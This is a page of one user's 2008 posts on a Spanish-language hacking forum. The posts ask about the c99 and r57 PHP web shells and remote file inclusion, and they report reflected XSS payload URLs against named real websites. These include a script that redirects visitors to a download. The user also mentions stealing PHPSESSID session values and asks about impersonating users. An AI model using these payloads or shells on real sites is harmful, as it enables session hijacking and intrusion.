elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1] 2 3 4
1  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 30 Mayo 2008, 22:41 pm
mm todavia con el ? al final no funciona, seguro que no es vulnerable.  :P

Y seguro que es vulnerable?

no es inclusion por iframes? ;D

Suele pasar :P

checa si en lugar de hacer include con php sea con iframes, o frames :P

como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas.

me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis

Citar
<html><head><title>www.google.com</title></head><frameset rows="100,*" frameborder="0" border="0" framespacing="0"><frame noresize="noresize" src="allc_header.php?url=www.google.com" scrolling=no marginwidth=0 marginheight=0><frame src=http://www.google.com><noframes>Your browser does not support frames. allc.com uses frames to display results.  You can view the <a href=http://www.google.com>referring page</a> </noframes></frameset></html>

si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google?

ah y de verdad muchas gracias a los dos por darme una mano  ;D ;D ;D
2  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 30 Mayo 2008, 18:35 pm
se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo.

alguien me podria decir porque esto funciona:

php?url=www.google.com

y esto no funciona

php?url=usuarios.lycos.es/theripperm/shell/r57.txt

este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?

 :huh: :huh: :huh:
3  Seguridad Informática / Nivel Web / c99.txt y r57.txt en: 30 Mayo 2008, 18:15 pm
quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.
4  Seguridad Informática / Nivel Web / Nuevo Mensaje en: 26 Mayo 2008, 18:56 pm
Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
Código:
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0
5  Seguridad Informática / Hacking / Re: conectar a hotmail por consola en: 9 Mayo 2008, 16:58 pm
es un ping tradicional, usas el protocolo ICMP para eso?
6  Seguridad Informática / Hacking / Re: conectar a hotmail por consola en: 8 Mayo 2008, 21:14 pm
Karcrack, conseguiste iniciar sesión por consola o con algún programa? algún ejemplo o detalle para comentar? ese link que diste esta mas avanzado que otros que yo habia visto. Saludos.
 ;D
7  Seguridad Informática / Nivel Web / Dudas sobre XXS en: 13 Abril 2008, 04:01 am
cuando en una pagina se piden datos.. tambien se pueden insertar scripts ahi no? pero que pasa con las paginas que siempre ponen (") a inicio y al final de la cadena de texto o cuando codifican los caracteres < y > ? estas paginas no son vulnerables o hay tecnicas para saltar estos filtros?

otra cosa sobre los scripts. ¿tambièn se puede hacer con vbscript? y dònde puedo aprender mas sobre scripts?  es muy boba la pregunta, pero quizàs àlguien tenga algùn buen link.

Gracias.
8  Seguridad Informática / Nivel Web / Re: [XSS] lawebdelprogramador en: 12 Abril 2008, 12:57 pm
creo q es xss no xxs, pero es una tonteria jej :p

solucionado, Gracias  ;D.


Antes de la descarga existe un "POP ALLOW" tanto en firefox como en IE, para un usuario dummie, lo pasaria por alto y el XSS de nada serviria :D, podria ofuscarse un poco mas el code para forzar al nevegador y que no se observe el POP.

-berz3k.



Como se podria hacer eso? aprovechando otro bug? o con un script se puede?



Para poner bugs en el foro, tenes q poner todo la info en una web tuya, y en el post, poner el link citandose esa web, para desligar al foro, creo q es por precausion solamente, pero es una norma.


Nu sabia, si hay que borrar el post esta todo bien :]
9  Seguridad Informática / Nivel Web / [XSS] lawebdelprogramador en: 12 Abril 2008, 01:48 am
la web del programador no tiene sistema de usuarios asi que creo que esto no haga ningun mal... si se puede hacer daño aliento a que NO lo hagan eso solo lo hago con el fin de aprender...

esto si funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(5)</script>

esto no funciona:

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>alert(vulnerable)</script>

porque? hay que codificar el texto de algun modo? hay algun tipo de filtro?
y que se puede lograr en un ataque de este tipo a una web que no tiene usuarios y passwords? robar cookies no tiene ningun sentido aparente o si ?

----- MINUTOS DEPUES ----

JAJAJA esto es groso jajajjaja

http://www.lawebdelprogramador.com/news/mostrar_new.php?id=29&texto=<script>self.location='http://www.winrar.es/descargas/52';</script>

parece como que descarga el winrar desde la web del programador jajajjaja

esta bueno, perdon por la alegria pero es la primera vez que hago algo asi jajaj

ahora le veo muchas utilidades!  :xD :xD :xD

10  Seguridad Informática / Nivel Web / Re: [XSS] foroswebgratis en: 9 Abril 2008, 00:43 am
Seguramente por las comillas dobles

es verdad, porque esto SI funciona:

http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert()</script>

y mi duda sobre las cookies es asi:

Si las cookies robadas pertenecen a la pagina mediante la cual se esta llevando el ataque, o sea... en este caso solo se pueden robar cookies de la pagina foroswebgratis? o si la persona esta, por ejemplo, tambien logueada en otro foro al mismo tiempo... esas cookies tambien pueden ser robadas? o es necesario una vulnerabilidad similar en la otra pagina?

----------------- Minutos despues ----------------------

segui paso a paso las instrucciones y al usar el codigo en la pagina se crea un archivo log.txt que contiene valores de PHPSESSID, me aprecen 3 y son el mismo valor asi que supongo que son solo de la misma pagina (foroswebgratis)

Pero PHPSESSID no son cookies, no son un valor para definir una sesion? se puede emplear para suplantar la sesion de un usuario?
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines